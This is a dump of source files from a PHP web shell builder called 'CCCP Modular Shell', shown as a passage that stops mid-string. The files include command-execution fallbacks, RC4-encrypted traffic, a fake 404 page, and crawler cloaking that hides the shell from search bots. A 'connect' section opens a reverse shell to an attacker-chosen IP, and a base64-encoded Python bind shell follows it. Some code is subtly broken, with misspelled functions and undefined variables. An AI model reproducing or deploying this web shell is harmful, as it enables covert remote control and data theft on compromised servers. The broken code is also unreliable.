| @ob_end_clean(); 273 | } else if (function_exists('popen') && !in_array('popen', $dis_func)){ 274 | $h = popen($e, 'r'); 275 | if (is_rource($h)){ 276 | if (function_exists('fread') && function_exists('feof')){ 277 | while (!feof($h)) 278 | $r .= fread($h, 512); 279 | } else if (function_exists('fgets') && function_exists('feof')){ 280 | while (!feof($h)) 281 | $r .= fgets($h, 512); 282 | } 283 | } 284 | pclose($h); 285 | } else if (function_exists('proc_open') && !in_array('proc_open', $dis_func)){ 286 | $ds = array(1 => array('pipe', 'w')); 287 | //$ds = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w')); 288 | $h = @proc_open($e, $ds, $pipes); 289 | //$h = @proc_open($e, $ds, $pipes, getcwd(), array()); 290 | if (is_rource($h)){ 291 | if (function_exists('fread') && function_exists('feof')){ 292 | while (!feof($pipes[1])) 293 | $r .= fread($pipes[1], 512); 294 | } else if (function_exists('fgets') && function_exists('feof')){ 295 | while (!feof($pipes[1])) 296 | $r .= fgets($pipes[1], 512); 297 | /*while (!feof($pipes[2])) 298 | $r .= fgets($pipes[2], 512);*/ 299 | } 300 | } 301 | @proc_close($h); 302 | } 303 | 304 | return($r); 305 | } 306 | 307 | function safeStatus(){ 308 | $safe_mode = @ini_get('safe_mode'); 309 | if (!$safe_mode && strpos(execute('echo abcdef'), 'def') != 3) $safe_mode = true; 310 | return $safe_mode; 311 | } 312 | 313 | function getcfg($n){ 314 | $result = get_cfg_var($n); 315 | if ($result == 0) return tText('no', 'no'); 316 | else if ($result == 1) return tText('yes', 'yes'); 317 | else return $result; 318 | } 319 | 320 | function sizecount($s){ 321 | if ($s[0] === '*') return $s; 322 | $sizename = array(' B', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB'); 323 | return @round( $s / pow(1024, ($i = floor(log($s, 1024)))), 2) . $sizename[$i]; 324 | } 325 | 326 | function getPath($s, $n){ 327 | if ($n === '.') $n = $s; 328 | if (substr($n, -1) !== DS) $n = $n . DS; 329 | return $n; 330 | } 331 | 332 | function getUpPath($n){ 333 | $pathdb = explode(DS, $n); 334 | $num = count($pathdb); 335 | if ($num > 2) unset($pathdb[$num - 1], $pathdb[$num - 2]); 336 | $uppath = implode(DS, $pathdb) . DS; 337 | return $uppath; 338 | } 339 | 340 | function get_all_files($path){ 341 | $files = glob(realpath($path).DS.'*'); 342 | foreach ($variable as $value) { 343 | if (is_dir($value)){ 344 | $subdir = glob($value.DS.'*'); 345 | if (is_array($files) && is_array($subdir)) $files = array_merge($files, $subdir); 346 | } 347 | } 348 | return $files; 349 | } 350 | 351 | function sAjax($i){ 352 | global $config; 353 | exit(base64_encode(rc4encrypt($i, $config['sPass']))); 354 | } 355 | 356 | function sDialog($i){ 357 | return "
$i

"; 358 | } 359 | 360 | function sValid($v){ 361 | return ((isset($v)) && ($v !== '')); 362 | } 363 | 364 | function filesize64($file){ 365 | $size = filesize($file); 366 | if ($size > 1610612736 or $size < -1){ 367 | /* 368 | global $isWIN; 369 | $size = 0; 370 | if (!safeStatus()){ 371 | $cmd = ($isWIN) ? "for %F in (\"$file\") do @echo %~zF" : "stat -c%s \"$file\""; 372 | execute($cmd, $output); 373 | ctype_digit($size = trim($output)); 374 | } 375 | 376 | if ($isWIN && class_exists("COM")){ 377 | try { 378 | $fsobj = new COM('Scripting.FileSystemObject'); 379 | $f = $fsobj->GetFile(realpath($file)); 380 | $size = $f->Size; 381 | } catch (Exception $e){} 382 | } 383 | 384 | $piece = 1073741824; 385 | $fp = @fopen($file, 'r'); 386 | @fseek($fp, 0, SEEK_SET); 387 | while ($piece > 1){ 388 | @fseek($fp, $piece, SEEK_CUR); 389 | if (@fgetc($fp) === false){ 390 | @fseek($fp, -$piece, SEEK_CUR); 391 | $piece = (int)($piece / 2); 392 | } else { 393 | @fseek($fp, -1, SEEK_CUR); 394 | $size += $piece; 395 | } 396 | } 397 | 398 | while (@fgetc($fp) !== false) 399 | $size++; 400 | 401 | @fclose($file_pointer); 402 | */ 403 | $size = sprintf("%u", $size); 404 | $sizename = array(' B', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB'); 405 | $size = '* ' . @round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i]; 406 | } 407 | 408 | return $size; 409 | } 410 | -------------------------------------------------------------------------------- /builder/base/loader.js: -------------------------------------------------------------------------------- 1 | function rc4Init(key) { 2 | j = 0; 3 | box = []; 4 | keylength = key.length; 5 | 6 | for (i = 0; i < 256; i++) { 7 | box[i] = i; 8 | } 9 | 10 | for (i = 0; i < 256; i++) { 11 | j = (j + box[i] + key.charCodeAt(i % keylength)) % 256; 12 | tmp = box[i]; 13 | box[i] = box[j]; 14 | box[j] = tmp; 15 | } 16 | 17 | return box; 18 | } 19 | 20 | function rc4(data, box) { 21 | i = 0; 22 | j = 0; 23 | res = ''; 24 | datalength = data.length; 25 | for (y = 0; y < datalength; y++) { 26 | i = (i + 1) % 256; 27 | j = (j + box[i]) % 256; 28 | tmp = box[i]; 29 | box[i] = box[j]; 30 | box[j] = tmp; 31 | res += String.fromCharCode(data.charCodeAt(y) ^ box[(box[i] + box[j]) % 256]); 32 | } 33 | 34 | return res; 35 | } 36 | 37 | //MD5 - DSR! 38 | function add32(a, b) { 39 | return (a + b) & 0xFFFFFFFF; 40 | } 41 | 42 | function cmn(q, a, b, x, s, t) { 43 | a = add32(add32(a, q), add32(x, t)); 44 | return add32((a << s) | (a >>> (32 - s)), b); 45 | } 46 | 47 | function ff(a, b, c, d, x, s, t) { 48 | return cmn((b & c) | ((~b) & d), a, b, x, s, t); 49 | } 50 | 51 | function gg(a, b, c, d, x, s, t) { 52 | return cmn((b & d) | (c & (~d)), a, b, x, s, t); 53 | } 54 | 55 | function hh(a, b, c, d, x, s, t) { 56 | return cmn(b ^ c ^ d, a, b, x, s, t); 57 | } 58 | 59 | function ii(a, b, c, d, x, s, t) { 60 | return cmn(c ^ (b | (~d)), a, b, x, s, t); 61 | } 62 | 63 | function md5cycle(x, k) { 64 | a = x[0]; 65 | b = x[1]; 66 | c = x[2]; 67 | d = x[3]; 68 | 69 | a = ff(a, b, c, d, k[0], 7, -680876936); 70 | d = ff(d, a, b, c, k[1], 12, -389564586); 71 | c = ff(c, d, a, b, k[2], 17, 606105819); 72 | b = ff(b, c, d, a, k[3], 22, -1044525330); 73 | a = ff(a, b, c, d, k[4], 7, -176418897); 74 | d = ff(d, a, b, c, k[5], 12, 1200080426); 75 | c = ff(c, d, a, b, k[6], 17, -1473231341); 76 | b = ff(b, c, d, a, k[7], 22, -45705983); 77 | a = ff(a, b, c, d, k[8], 7, 1770035416); 78 | d = ff(d, a, b, c, k[9], 12, -1958414417); 79 | c = ff(c, d, a, b, k[10], 17, -42063); 80 | b = ff(b, c, d, a, k[11], 22, -1990404162); 81 | a = ff(a, b, c, d, k[12], 7, 1804603682); 82 | d = ff(d, a, b, c, k[13], 12, -40341101); 83 | c = ff(c, d, a, b, k[14], 17, -1502002290); 84 | b = ff(b, c, d, a, k[15], 22, 1236535329); 85 | 86 | a = gg(a, b, c, d, k[1], 5, -165796510); 87 | d = gg(d, a, b, c, k[6], 9, -1069501632); 88 | c = gg(c, d, a, b, k[11], 14, 643717713); 89 | b = gg(b, c, d, a, k[0], 20, -373897302); 90 | a = gg(a, b, c, d, k[5], 5, -701558691); 91 | d = gg(d, a, b, c, k[10], 9, 38016083); 92 | c = gg(c, d, a, b, k[15], 14, -660478335); 93 | b = gg(b, c, d, a, k[4], 20, -405537848); 94 | a = gg(a, b, c, d, k[9], 5, 568446438); 95 | d = gg(d, a, b, c, k[14], 9, -1019803690); 96 | c = gg(c, d, a, b, k[3], 14, -187363961); 97 | b = gg(b, c, d, a, k[8], 20, 1163531501); 98 | a = gg(a, b, c, d, k[13], 5, -1444681467); 99 | d = gg(d, a, b, c, k[2], 9, -51403784); 100 | c = gg(c, d, a, b, k[7], 14, 1735328473); 101 | b = gg(b, c, d, a, k[12], 20, -1926607734); 102 | 103 | a = hh(a, b, c, d, k[5], 4, -378558); 104 | d = hh(d, a, b, c, k[8], 11, -2022574463); 105 | c = hh(c, d, a, b, k[11], 16, 1839030562); 106 | b = hh(b, c, d, a, k[14], 23, -35309556); 107 | a = hh(a, b, c, d, k[1], 4, -1530992060); 108 | d = hh(d, a, b, c, k[4], 11, 1272893353); 109 | c = hh(c, d, a, b, k[7], 16, -155497632); 110 | b = hh(b, c, d, a, k[10], 23, -1094730640); 111 | a = hh(a, b, c, d, k[13], 4, 681279174); 112 | d = hh(d, a, b, c, k[0], 11, -358537222); 113 | c = hh(c, d, a, b, k[3], 16, -722521979); 114 | b = hh(b, c, d, a, k[6], 23, 76029189); 115 | a = hh(a, b, c, d, k[9], 4, -640364487); 116 | d = hh(d, a, b, c, k[12], 11, -421815835); 117 | c = hh(c, d, a, b, k[15], 16, 530742520); 118 | b = hh(b, c, d, a, k[2], 23, -995338651); 119 | 120 | a = ii(a, b, c, d, k[0], 6, -198630844); 121 | d = ii(d, a, b, c, k[7], 10, 1126891415); 122 | c = ii(c, d, a, b, k[14], 15, -1416354905); 123 | b = ii(b, c, d, a, k[5], 21, -57434055); 124 | a = ii(a, b, c, d, k[12], 6, 1700485571); 125 | d = ii(d, a, b, c, k[3], 10, -1894986606); 126 | c = ii(c, d, a, b, k[10], 15, -1051523); 127 | b = ii(b, c, d, a, k[1], 21, -2054922799); 128 | a = ii(a, b, c, d, k[8], 6, 1873313359); 129 | d = ii(d, a, b, c, k[15], 10, -30611744); 130 | c = ii(c, d, a, b, k[6], 15, -1560198380); 131 | b = ii(b, c, d, a, k[13], 21, 1309151649); 132 | a = ii(a, b, c, d, k[4], 6, -145523070); 133 | d = ii(d, a, b, c, k[11], 10, -1120210379); 134 | c = ii(c, d, a, b, k[2], 15, 718787259); 135 | b = ii(b, c, d, a, k[9], 21, -343485551); 136 | 137 | x[0] = add32(a, x[0]); 138 | x[1] = add32(b, x[1]); 139 | x[2] = add32(c, x[2]); 140 | x[3] = add32(d, x[3]); 141 | } 142 | 143 | function md5(s) { 144 | txt = ''; 145 | n = s.length; 146 | state = [1732584193, -271733879, -1732584194, 271733878]; 147 | for (i = 64; i <= s.length; i += 64) { 148 | md5cycle(state, md5blk(s.substring(i - 64, i))); 149 | } 150 | s = s.substring(i - 64); 151 | tail = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; 152 | for (i = 0; i < s.length; i++) 153 | tail[i >> 2] |= s.charCodeAt(i) << ((i % 4) << 3); 154 | tail[i >> 2] |= 0x80 << ((i % 4) << 3); 155 | if (i > 55) { 156 | md5cycle(state, tail); 157 | for (i = 0; i < 16; i++) tail[i] = 0; 158 | } 159 | tail[14] = n * 8; 160 | md5cycle(state, tail); 161 | return hex(state); 162 | } 163 | 164 | function md5blk(s) { 165 | md5blks = []; 166 | for (i = 0; i < 64; i += 4) 167 | md5blks[i >> 2] = s.charCodeAt(i) + (s.charCodeAt(i + 1) << 8) + (s.charCodeAt(i + 2) << 16) + (s.charCodeAt(i + 3) << 24); 168 | 169 | return md5blks; 170 | } 171 | 172 | function hex(x) { 173 | hex_chr = '0123456789abcdef'.split(''); 174 | for (i = 0; i < x.length; i++){ 175 | s = ''; 176 | for (j = 0; j < 4; j++) 177 | s += hex_chr[(x[i] >> (j * 8 + 4)) & 0x0F] + hex_chr[(x[i] >> (j * 8)) & 0x0F]; 178 | x[i] = s; 179 | } 180 | return x.join(''); 181 | } 182 | 183 | function randStr(l) { 184 | s = ""; 185 | while(s.length < l) 186 | s += Math.random().toString(36).slice(2); 187 | 188 | return s.substr(0, l); 189 | } -------------------------------------------------------------------------------- /builder/base/loader.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 49 | 50 |

Not Found

51 |

The requested URL was not found on this server.

52 | 53 |
54 | 55 | -------------------------------------------------------------------------------- /builder/base/theme.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | CCCP Modular Shell 10 | 15 | 18 | 19 | 20 |
21 | 22 | 23 | 26 | 27 | 28 | 34 | 35 | 36 | 37 | 38 |
24 |

CCCP Modular Shell

25 |
29 |

Software: ' . $_SERVER['SERVER_SOFTWARE'] . '

30 |

uname -a: ' . php_uname() . '

31 |

Safe-mode: ' . getcfg('safe_mode') . '

32 |
{{_MENU_}}
33 |
39 | 40 | --[ CCCP Modular Shell v1.0 by DSR! | Generation time: 0.00 ]-- 41 |
42 | 43 | -------------------------------------------------------------------------------- /builder/base/zip.php: -------------------------------------------------------------------------------- 1 | cut_from_route = strlen(dirname($basedir . $filelist[0])) + 1; 12 | foreach ($filelist as $f){ 13 | $f = $basedir . $f; 14 | if (is_dir($f)) 15 | $this->AddFolderContent($f); 16 | else if (is_file($f)) 17 | $this->addFileProc($f); 18 | } 19 | } 20 | 21 | function AddFolderContent($dir){ 22 | if (!file_exists($dir)) 23 | return false; 24 | 25 | $h = @opendir($dir); 26 | while (false !== ($f = @readdir($h))) { 27 | if ($f === '.' || $f === '..') 28 | continue; 29 | 30 | $f = $dir . $f; 31 | if (is_dir($f)) 32 | $this->AddFolderContent($f . DS); 33 | else if (is_file($f)) 34 | $this->addFileProc($f); 35 | } 36 | @closedir($h); 37 | } 38 | 39 | function addFileProc($file){ 40 | if (!file_exists($file)) 41 | return false; 42 | 43 | $this->addFile(file_get_contents($file), substr($file, $this->cut_from_route)); 44 | } 45 | 46 | function unix2DosTime($t = 0){ 47 | $ta = ($t == 0) ? getdate() : getdate($t); 48 | if ($ta['year'] < 1980) $ta = array('year' => 1980, 'mon' => 1, 'mday' => 1, 'hours' => 0, 'minutes' => 0, 'seconds' => 0); 49 | return (($ta['year'] - 1980) << 25) | ($ta['mon'] << 21) | ($ta['mday'] << 16) | ($ta['hours'] << 11) | ($ta['minutes'] << 5) | ($ta['seconds'] >> 1); 50 | } 51 | 52 | function hex2bin($s){ 53 | $bin = ''; 54 | $i = 0; 55 | do { 56 | $bin .= chr(hexdec($s{$i}.$s{($i + 1)})); 57 | $i += 2; 58 | } while ($i < strlen($s)); 59 | return $bin; 60 | } 61 | 62 | function addFile($data, $name, $time = 0){ 63 | $dtime = dechex($this->unix2DosTime($time)); 64 | $hexdtime = $this->hex2bin($dtime[6] . $dtime[7] . $dtime[4] . $dtime[5] . $dtime[2] . $dtime[3] . $dtime[0] . $dtime[1]); 65 | $packv0 = pack('v', 0); 66 | $zdata = gzcompress($data); 67 | $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 68 | 69 | // "local file header" segment 70 | $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00" . $hexdtime; 71 | $pack_info = pack('V', crc32($data)) . pack('V', strlen($zdata)) . pack('V', strlen($data)); 72 | 73 | $fr .= $pack_info . pack('v', strlen($name)) . $packv0 . $name; 74 | $fr .= $zdata; // "file data" segment 75 | $fr .= $pack_info; // "data descriptor" segment 76 | $this->datasec[] = $fr; 77 | 78 | // now add to central directory record 79 | $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00" . $hexdtime; 80 | $cdrec .= $pack_info . pack('v', strlen($name)) . $packv0 . $packv0 . $packv0 . $packv0 . pack('V', 32); 81 | $cdrec .= pack('V', $this->old_offset) . $name; 82 | 83 | // save to central directory 84 | $this->old_offset += strlen($fr); 85 | $this->file_count += 1; 86 | $this->ctrl_dir[] = $cdrec; 87 | } 88 | 89 | function file(){ 90 | $data = implode('', $this->datasec); 91 | $ctrldir = implode('', $this->ctrl_dir); 92 | return $data . $ctrldir . "\x50\x4b\x05\x06\x00\x00\x00\x00" . pack('v', $this->file_count) . pack('v', $this->file_count) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . " "; 93 | } 94 | 95 | function output($file){ 96 | return file_put_contents($file, $this->file()); 97 | } 98 | } 99 | 100 | function zip($files, $archive){ 101 | if(!extension_loaded('zip')) return false; 102 | $zip = new ZipArchive(); 103 | if(!$zip->open($archive, 1)) return false; 104 | 105 | if(!is_array($files)) $files = array($files); 106 | foreach($files as $file){ 107 | $file = str_replace(get_cwd(), '', $file); 108 | $file = str_replace('\\', '/', $file); 109 | if(is_dir($file)){ 110 | $filesIterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($file), 1); 111 | foreach($filesIterator as $iterator){ 112 | $iterator = str_replace('\\', '/', $iterator); 113 | if(in_array(substr($iterator, strrpos($iterator, '/')+1), array('.', '..'))) continue; 114 | if(is_dir($iterator)) $zip->addEmptyDir(str_replace($file.'/', '', $iterator.'/')); 115 | else if(is_file($iterator)) $zip->addFromString(str_replace($file.'/', '', $iterator), read_file($iterator)); 116 | } 117 | } else if(is_file($file)) 118 | $zip->addFromString(basename($file), read_file($file)); 119 | } 120 | if($zip->getStatusString()!==false) return true; 121 | $zip->close(); 122 | } 123 | 124 | function compress($type, $archive, $files){ 125 | if (!is_array($files)) $files = array($files); 126 | if ($type=='zip'){ 127 | if(class_exists('ZipArchive')) 128 | if (zip($files, $archive)) return true; 129 | else { 130 | //TODO 131 | } 132 | } else if ($type=='tar' || $type=='targz') { 133 | $archive = basename($archive); 134 | $listsBasename = array_map('basename', $files); 135 | $lists = array_map('wrap_with_quotes', $listsBasename); 136 | $command = ($type == 'targz' ? 'czf' : 'cf'); 137 | execute('tar '.$command.'czf "'.$archive.'" '.implode(' ', $lists)); 138 | return is_file($archive); 139 | } 140 | return false; 141 | } 142 | 143 | function decompress($type, $archive, $path){ 144 | $path = realpath($path).DS; 145 | if(is_dir($path)){ 146 | chdir($path); 147 | if($type=='unzip'){ 148 | if(class_exists('ZipArchive')){ 149 | $zip = new ZipArchive(); 150 | $target = $path.basename($archive,'.zip'); 151 | if($zip->open($archive)){ 152 | if(!is_dir($target)) mkdir($target); 153 | $zip->extractTo($target); //return true; 154 | return $zip->close(); 155 | } 156 | } 157 | } else if ($type=='tar' || $type=='targz') { 158 | $target = ''; 159 | if(strpos(strtolower($archive), '.tar.gz')!==false) $target = basename($archive,'.tar.gz'); 160 | else if(strpos(strtolower($archive), '.tgz')!==false) $target = basename($archive,'.tgz'); 161 | else if(strpos(strtolower($archive), '.tar')!==false) $target = basename($archive,'.tar'); 162 | 163 | if(!is_dir($target)) mkdir($target); 164 | $before = count(get_all_files($target)); 165 | $command = ($type == 'untargz' ? 'xzf' : 'xf'); 166 | execute('tar '.$command.' "'.basename($archive).'" -C "'.$target.'"'); 167 | $after = count(get_all_files($target)); 168 | return $before != $after; 169 | } 170 | } 171 | return false; 172 | } 173 | -------------------------------------------------------------------------------- /builder/builder.php: -------------------------------------------------------------------------------- 1 | {$name}", 'ajaxLoad("me=' . $plugin . '")') . ' | '; 36 | 37 | //plugins 38 | $code = file_get_contents("{$folder}/{$plugin}.php"); 39 | if (!empty($sections)) { 40 | $sections .= ' else '; 41 | } 42 | 43 | $sections .= "if (\$p['me'] === '{$plugin}') { 44 | {$code} 45 | }"; 46 | 47 | if (file_exists("{$folder}/{$plugin}.js")) { 48 | $js .= file_get_contents("{$folder}/{$plugin}.js"); 49 | } 50 | 51 | if (file_exists("{$folder}/{$plugin}.css")) { 52 | $css .= file_get_contents("{$folder}/{$plugin}.css"); 53 | } 54 | } 55 | 56 | 57 | // termino de armar 58 | $defAction = "filemanager' . (isset(\$p['dir']) ? '&dir=' . rawurlencode(\$p['dir']) : '') . '"; 59 | $menu .= mLink('Logout', 'if (confirm("Are you sure?")) {sessionStorage.clear();hash="";d.getElementsByTagName("html")[0].innerHTML="";}'); 60 | $js = 'var config = ' . json_encode($config) . ";\n" . $js; 61 | 62 | 63 | // con esto arreglo el escapado en php y las secciones 64 | $menu = str_replace("'", "\'", $menu); 65 | $js = str_replace("'", "\'", $js); 66 | $sections = str_replace(''dsr', 'slogin'=>'cccpshell', 'sqlclog'=>'conlog'); //Constants names 122 | \$config['sPass'] = '{$config['sPass']}'; // md5(pass) 123 | \$config['rc4drop'] = {$config['rc4drop']}; //drop size 124 | 125 | 126 | // ------ Start CCCPShell 127 | {$php} 128 | 129 | \$sBuff = ''; 130 | \$p = getData(); 131 | 132 | 133 | # Sections 134 | if (isset(\$p['me'])) { 135 | {$sections} 136 | } 137 | 138 | #Se fini 139 | if (isset(\$_SERVER['HTTP_X_REQUESTED_WITH']) && \$_SERVER['HTTP_X_REQUESTED_WITH'] === 'XMLHttpRequest') { 140 | sAjax(\$sBuff . mHide('etime', substr((microtime(true) - \$loadTime), 0, 4))); 141 | //sAjax(\$sBuff . mHide('etime', substr((microtime(true) - \$loadTime), 0, 4) . ' Mem Peak: ' . sizecount(memory_get_peak_usage(false)) . ' Men: ' . sizecount(memory_get_usage(false))) ); 142 | } else { 143 | \$uAgents = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler', 'Yahoo', 'Zeus', 'bot', 'Wget'); 144 | if (empty(\$_SERVER['HTTP_USER_AGENT']) || preg_match('/' . implode('|', \$uAgents) . '/i', \$_SERVER['HTTP_USER_AGENT'])) { 145 | header('HTTP/1.0 404 Not Found'); 146 | exit; 147 | } 148 | } 149 | ?> 150 | {$loader}"; 151 | 152 | 153 | 154 | //echo $shell; 155 | file_put_contents("{$baseFolder}/CCCP-Shell.php", $shell); 156 | echo 'Generation completed!'; 157 | -------------------------------------------------------------------------------- /builder/includes/jsPacker.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/builder/includes/jsPacker.php -------------------------------------------------------------------------------- /builder/includes/tools.php: -------------------------------------------------------------------------------- 1 | $t"; 6 | } 7 | 8 | function packer_write_file($file, $content){ 9 | if($fh = @fopen($file, "wb")){ 10 | if(fwrite($fh, $content)!==false){ 11 | if(!class_exists("ZipArchive")) return true; 12 | 13 | if(file_exists($file.".zip")) unlink ($file.".zip"); 14 | $zip = new ZipArchive(); 15 | $filename = "./".$file.".zip"; 16 | 17 | if($zip->open($filename, ZipArchive::CREATE)!==TRUE) return false; 18 | $zip->addFile($file); 19 | $zip->close(); 20 | return true; 21 | } 22 | } 23 | return false; 24 | } 25 | 26 | function packer_html_safe($str){ 27 | return htmlspecialchars($str, 2 | 1); 28 | } 29 | 30 | function packer_output($str){ 31 | header("Content-Type: text/plain"); 32 | header("Cache-Control: no-cache"); 33 | header("Pragma: no-cache"); 34 | echo $str; 35 | die(); 36 | } 37 | 38 | function packer_strips($str){ 39 | $newStr = ''; 40 | 41 | $commentTokens = array(T_COMMENT); 42 | if(defined('T_DOC_COMMENT')) $commentTokens[] = T_DOC_COMMENT; 43 | if(defined('T_ML_COMMENT')) $commentTokens[] = T_ML_COMMENT; 44 | 45 | $tokens = token_get_all($str); 46 | foreach($tokens as $token){ 47 | if (is_array($token)) { 48 | if (in_array($token[0], $commentTokens)) 49 | continue; 50 | 51 | $token = $token[1]; 52 | } 53 | 54 | $newStr .= $token; 55 | } 56 | 57 | 58 | $newStr = preg_replace('!/\*.*?\*/!s', '', $newStr); 59 | $newStr = preg_replace('/\n\s*\n/', "\n", $newStr); 60 | //$newStr = preg_replace("/(\s{2,})/", " ", $newStr); 61 | 62 | return $newStr; 63 | } 64 | 65 | function packer_pack_js($str){ 66 | $packer = new JavaScriptPacker($str, 0, true, false); 67 | return $packer->pack(); 68 | } 69 | -------------------------------------------------------------------------------- /builder/sections/connect.php: -------------------------------------------------------------------------------- 1 | The Program is now trying to connect!

'; 7 | $sockfd = fsockopen($ip, $port, $errno, $errstr); 8 | if ($errno != 0){ 9 | $sBuff .= "$errno: $errstr"; 10 | } else if (!$sockfd){ 11 | $result = '

Fatal: An unexpected error was occured when trying to connect!

'; 12 | } else { 13 | $len = 1500; 14 | fputs($sockfd, execute('uname -a') . "\n"); 15 | fputs($sockfd, execute('pwd') . "\n"); 16 | fputs($sockfd, execute('id') . "\n\n"); 17 | fputs($sockfd, execute('time /t & date /T') . "\n\n"); 18 | 19 | while (!feof($sockfd)) { 20 | fputs($sockfd, '(Shell)[$]> '); 21 | fputs($sockfd, "\n" . execute(fgets($sockfd, $len)) . "\n\n"); 22 | } 23 | fclose($sockfd); 24 | } 25 | } else if (@(sValid($p['port'])) && (sValid($p['passwd'])) && (sValid($p['mode']))){ 26 | $address = '127.0.0.1'; 27 | $port = $p['port']; 28 | $pass = $p['passwd']; 29 | 30 | if ($p['mode'] === 'Python'){ 31 | $Python_CODE = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwg